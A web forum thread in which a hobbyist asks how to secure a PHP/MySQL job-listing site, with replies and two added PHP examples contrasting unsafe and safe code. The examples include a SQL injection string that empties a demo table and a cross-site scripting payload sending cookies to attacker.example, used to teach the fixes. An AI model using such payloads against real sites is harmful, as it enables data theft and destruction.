#1
Programmer
Join Date: Apr 2008
Posts: 47
Rep Power: 0
I have started a project of my own, a non-profit database-backed web site to help students who are looking for a summer job (as you might have guessed from my previous questions). I am very worried about hacking and malicious attempts at deleting the database or causing problems.

What experiences do you have, and what measures do you find necessary, when working with MySQL, PHP and JS in developing such interactive web sites? Although no one will be paying for anything and it is an experiment of my own, I still feel it has to be as secure as a professional job (in real life yours truly is not a professional programmer, as you might have correctly figured out, but I find this type of programming a very interesting hobby, very much like the clock makers of a few centuries ago).

Yours, Logical 1

PS In case anyone is interested in participating in such a project, let me know. But meanwhile please suggest measures to make the thing secure for the users.
__________________
^c^
#2
Battle Programmer
Join Date: Feb 2006
Location: Bellevue, WA, USA
Posts: 763
Rep Power: 3
Re: Security
Validate all and any user input - this is key. Use mysql_real_escape_string() for any and all input that goes into a query. Consider using parameterized queries or stored procedures (not sure what PHP/MySQL supports in this regard, you'll have to look around). Also learning about SQL Injection attacks (the biggest exploit you're trying to prevent) and how to prevent them might yield other ideas.
__________________
<insert disclaimer here> <insert shameless plug for Visual Studio here>
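As an added example (not code from any post in this thread), here is the difference between building the query by string concatenation, which is what an escaping function is meant to patch over, and the parameterized query Jimbo suggests. It assumes PHP 5.1 or later with PDO and the pdo_sqlite driver; an in-memory SQLite table stands in for MySQL so the script runs without a server, and the table, rows and hostile form value are all constructed for the demo. Note that the original poster's PHP 4.0.3 predates PDO; on that version the only option is escaping, and every value must go through the escaping function with the connection's character set.

```php
<?php
// Added example for this thread, not code from the original posts. Assumes PHP >= 5.1
// with PDO and the pdo_sqlite driver. An in-memory SQLite table stands in for MySQL so
// the script runs without a database server; the table, rows and hostile input below
// are constructed for the demo.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE jobs (id INTEGER PRIMARY KEY, title TEXT, contact TEXT)");
$db->exec("INSERT INTO jobs (title, contact) VALUES ('Lifeguard', 'pool@example.org')");
$db->exec("INSERT INTO jobs (title, contact) VALUES ('Camp counsellor', 'camp@example.org')");

// VULNERABLE: the form value is pasted straight into the SQL text. A quote in the
// value ends the string literal early and whatever follows is executed as SQL.
function searchUnsafe(PDO $db, $term)
{
    $sql = "SELECT title FROM jobs WHERE title = '" . $term . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// SAFE: a prepared statement. The SQL text is fixed before the value is supplied; the
// value travels separately as data and cannot change the query's structure.
function searchSafe(PDO $db, $term)
{
    $stmt = $db->prepare("SELECT title FROM jobs WHERE title = ?");
    $stmt->execute(array($term));
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Same bug on a delete path, which is the "deleting the database" worry from post #1.
function deleteUnsafe(PDO $db, $term)
{
    return $db->exec("DELETE FROM jobs WHERE title = '" . $term . "'");
}

function countJobs(PDO $db)
{
    return (int) $db->query("SELECT COUNT(*) FROM jobs")->fetchColumn();
}

// Hostile "Job title" field (constructed): closes the literal and appends an
// always-true condition, so WHERE title = 'x' becomes WHERE title = 'x' OR '1'='1'.
$hostile = "x' OR '1'='1";

echo "Concatenated query: ", json_encode(searchUnsafe($db, $hostile)), "\n";
echo "Prepared statement: ", json_encode(searchSafe($db, $hostile)), "\n";

$deleted = deleteUnsafe($db, $hostile);
echo "Injected DELETE removed $deleted row(s); ", countJobs($db), " left\n";
```

Run it with `php inject.php`. The concatenated search returns both titles, because the injected `OR '1'='1'` matched every row, and the same value on the delete path empties the table; the prepared statement returns nothing, since no job has the literal title `x' OR '1'='1`. Escaping (mysql_real_escape_string() or similar) works only if it is applied to every value that reaches a query; a prepared statement removes the quote-closing problem entirely, which is why it is the preferred fix where the PHP version allows it.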
#3
Programming Guru
Re: Security
The first thing that came to my mind was SQL Injection, which Jimbo has already mentioned. Best bet, for starters, is to read up on that and determine the most efficient way to block such an attack. May as well block all of China and Taiwan while you're at it..
j/k
__________________
http://jasonpowers.net "There are a thousand hacking at the branches of evil to one who is striking at the root."
#4
Professional Programmer
Join Date: May 2006
Location: UK - London
Posts: 330
Rep Power: 3
Re: Security
Also look into sanitizing all your user generated content to protect against cross site scripting.
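As an added example (not from any post in this thread), here is what "sanitizing user generated content" against cross-site scripting looks like in PHP when done at output time: the raw text is stored as submitted and escaped for the HTML context it is written into. It assumes PHP 5.4 or later for the ENT_HTML5 flag (on older versions, including PHP 4, htmlspecialchars() with ENT_QUOTES alone works); the hostile job description and title are constructed for the demo.

```php
<?php
// Added example for this thread, not code from the original posts. Assumes PHP >= 5.4
// (for the ENT_HTML5 flag; on older versions use ENT_QUOTES alone). The job description
// and title below are constructed to show what a hostile submission looks like.

// What an attacker types into the "Job description" field: when any visitor views the
// listing, their browser runs this and sends their session cookie to the attacker's site.
$hostileDescription = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>';

// UNSAFE: user content echoed into the page as-is, so the browser treats it as markup.
function renderUnsafe($description)
{
    return "<p>" . $description . "</p>";
}

// SAFE: escape at output time for the context being written into. For text inside an
// element, htmlspecialchars() turns < > & " ' into entities, so the browser displays
// the characters instead of interpreting them as tags or attributes.
function escapeHtml($text)
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function renderSafe($description)
{
    return "<p>" . escapeHtml($description) . "</p>";
}

// The same escaping covers a value inside a quoted attribute, e.g. re-filling the form
// after a validation error. ENT_QUOTES matters here: without it a single-quoted
// attribute could still be broken out of.
function renderTitleField($title)
{
    return '<input type="text" name="title" value="' . escapeHtml($title) . '">';
}

echo renderUnsafe($hostileDescription), "\n";
echo renderSafe($hostileDescription), "\n";
echo renderTitleField('Lifeguard" onfocus="alert(document.cookie)'), "\n";
```

The design choice is to keep the stored text unchanged and escape every time it is written to a page, rather than "cleaning" it once on the way into the database: the same text may later be sent to other places (an e-mail, a JavaScript string, a URL) and each of those needs its own encoding, which htmlspecialchars() does not provide. Stripping tags on input also loses legitimate text such as a job description that mentions "<100 applicants".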
#5
Programmer
Join Date: Apr 2008
Posts: 47
Rep Power: 0
Thanks and ..
Thank you for your answers but I am still in the dark.
1. My server runs PHP 4.0.3 and I cannot run mysql_real_escape_string() on it, although this does not do much more than addslashes() or other similar stuff.

2. If a hacker would try to gain access he has to pass arguments into the forms. What specific examples do you know, and if my forms are simple, such as Name: Email: Phone: Job title: Job description: and the entries go to specific columns in specific tables, how can they hack?

3. Does anyone know a good PHP encryption function somewhere?

4. How do you sanitize your entries against SQL code entered instead of normal entries?

5. This issue sounds so vague that one doesn't know what to prevent. I can write code against what I know might happen; the problem is that in this case I do not know what else can be tried.

Thanks
__________________
^c^
#6
Battle Programmer
Join Date: Feb 2006
Location: Bellevue, WA, USA
Posts: 763
Rep Power: 3
Re: Security
1. It escapes any values which might affect a SQL query, IIRC. You can certainly use alternates or build your own.

2. If you don't validate the input going into the database, someone might try to read the data in it, or even just delete it (if you don't understand the comic, ask). They might also try to change arbitrary values or insert data.

4. Validate the data, or find an alternative to creating the SQL query in the webpage (e.g. stored procedures).

5. SQL Injection is a pretty well understood attack; understanding how it works hinges a lot (IMHO) on finding a description which is worded along the same lines your brain operates. Cross-site scripting (XSS), which kruptof brought up, is an attack largely brought about by the rise of AJAX, and it usually involves a malicious script which sends data contained in your website to whoever injected the script. There should still be plenty of information available about how the attack works and how to prevent it, if you look hard enough.
__________________
<insert disclaimer here> <insert shameless plug for Visual Studio here>
#7
Programmer
Join Date: Apr 2008
Posts: 47
Rep Power: 0
thank you
Thanks Jimbo and everybody else.

1. Silly as it seems, I think I have to write a function similar to mysql_real_escape_string() so it would run on my old version.

2. I have searched and did not find any way in PHP to read or recognize history (last page viewed, etc.). Does anyone have a solution for it? I am trying to find the last page before any form gets processed and limit it only to my own legitimate form (to avoid XSS).

3. If anyone knows of a good book on this topic it is highly appreciated.

When I started this project I thought I would be happy to see it work; apparently that's only half the problem.

L1
__________________
^c^